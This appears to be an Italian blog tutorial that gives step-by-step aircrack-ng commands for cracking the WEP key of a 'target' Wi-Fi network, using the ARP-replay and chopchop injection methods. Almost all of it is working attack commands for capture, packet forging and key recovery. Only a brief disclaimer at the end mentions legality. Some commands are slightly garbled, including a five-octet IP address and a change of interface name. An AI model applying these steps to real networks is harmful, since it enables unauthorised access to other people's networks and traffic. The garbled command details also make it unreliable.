PREREQUISITI:
- Avere una distribuzione Linux based
- conoscenze minime dei sistemi Unix
- aver installato la suite di tool aircrack-ng
1) arpreplay
2) chopchop
METODO ‘ARPREPLAY’
a) Per prima cosa dobbiamo sapere il nome della nostra interfaccia di rete wifi. Usiamo il seguente comando:
- iwconfig
b) Ora dobbiamo mettere la scheda in modalità monitor:
- sudo airmon-ng start wlan0
c) Ora dobbiamo fare una scansione delle reti presenti nelle vicinanze:
- sudo airodump-ng –write cap mon0
mon0 = è l’interfaccia di rete
In questo modo verranno scritte nel file cap.cap tutte le informazioni catturate.
d) Ora dobbiamo concentrarci sulla nostra rete bersaglio in modo da catturare escusivamente i file di quella rete:
- sudo airodump-ng -c [canale AP] -b [MAC address] -w cap mon0
-b = quì mettiamo il MAC dell’AP da cracckare
-w = scrive sempre sul file cap.cap
mon0 = è l’interfaccia di rete
Ora, l’unico modo per cracckare una rete è avere un grosso quantitativo di pacchetti da poter analizzare. Solitamente una rete non ha un grosso quantitativo di pacchetti come traffico, almeno che l’utente attaccato non stia usando la rete per qualche motivo. Ma in ogni caso ci vorrebbe molto tempo (provare per credere).
e) Il nostro scopo è di catturare 5000-10000 ‘DATA’ per una WEP 64 bit, 15000-20000 per una WEP 128 bit.
Quindi useremo il seguente comando:
- aireplay-ng –arpreplay -b [BSSID AP] -h [MAC STATION] [nome interfaccia]
-h = il MAC collegato a quell’AP che viene indicato in basso accanto al MAC dell’AP sotto la voce ‘STATION’
-[nome interfaccia] = la solita mon0
Come vedete stiamo usando il metodo ‘arpreplay’. Il metodo appena descritto è detto ‘packet injection’. Non tutte le schede supportano l’injection. Anche se ormai sono poche.
f) Appena avremo raggiunto i pacchetti (DATA) necessari dovremo lanciare il seguente comando:
- aircrack-ng -z -b [BSSID AP] [nome dei file catturati]*.cap
-b = MAC dell’AP
-[nome dei fiel catturati]*.cap nel nostro caso sarà ‘cap*.cap’ … l’asterisco sta per tutti i file cap
Nel caso i pacchetti non fossero abbastanza, comparirà un messaggio del tipo : “Try at 5000 IVS”
In questo caso non fate nulla, lasciate andare avanti la cattura dei pacchetti e appena saranno raggiunti i necessari richiesti, il programma ripartirà automaticamente.
Il messaggio di successo sarà : KEY FOUND! [XX:XX:XX:XX:XX] dove al posto delle X ci sarà la password dell’AP. Possiamo inserire direttamente la password togliendo i due punti, quindi XXXXXXXXXX.
METODO ‘CHOPCHOP’
Ora ripetiamo i punti a), b), c), d) della precedente parte.
In questo caso non dobbiamo usare la ‘STATION’ abbinata all’AP scelto, ma dobbiamo associare il MAC della nostra scheda all’AP in questo modo:
- aireplay-ng -1 0 -a [MAC AP] -h [MAC mia scheda] mon0
-1 = metodo per l’autentificazione
-a = il MAC dell’AP
-h = il MAC della nostra scheda
mon0 = interfaccia scheda
Ora, sempre usando il tool ‘aireplay-ng’, dobbiamo catturare i pacchetti:
- aireplay-ng -4 -b [MAC dell'AP] -h [MAC mia scheda] mon0
-b = MAC dell’AP
-h = MAC della mia scheda
mon0 = interfaccia come sempre
Ora dobbiamo creare un pacchetto per la richiesta di ARP con il toll packetforge-ng:
- packetforge-ng -0 -a [MAC dell'AP] -h [MAC mia scheda] -k 255.255.255.255 -l 255.255.255.255.255 -y [nome].xor -w [nome pacchetti]
-a = MAC dell’AP
-h = MAC mia scheda
-k = IP di destinazione
-l = source IP
-y = legge i PRGA dal file creato con aireplay-ng
-w = crea il file .cap
Ora dobbiamo eseguire il packet injection sfruttando i pacchetti catturati in precedenza (si raccomanda di usare sempre lo stesso nome dei pacchetti catturati per evitare di fare confusione):
- aireplay-ng -2 -r [nome file] ath0
-r = qui dobbiamo mettere il nome del file creato precedentemente con -w
Ora non ci resta che analizzare i pacchetti catturati per trovare la password:
- aircrack-ng -P 2 -b 00:18:F6:AC:11:13 [nome file]*.cap
2 = PTW
-b = MAC dell’AP
[nome file] = al posto di questo dobbiamo mettere il nome dei file catturati con -w
E come prima il risultato sarà: KEY FOUND! XX:XX:XX:XX:XX e la password è senza i due punti.
In caso di errori, suggerimenti o altro commentate!
DISCLAIMER: i metodi precedentemente descritti sono assolutamente illegali nel caso siano usati su reti non proprie o senza il consenso del proprietario. Non mi prendo nessuna responsabilità dell’uso di questa guida. Questa è esclusivamente a scopo informativo!

Nessun commento:
Posta un commento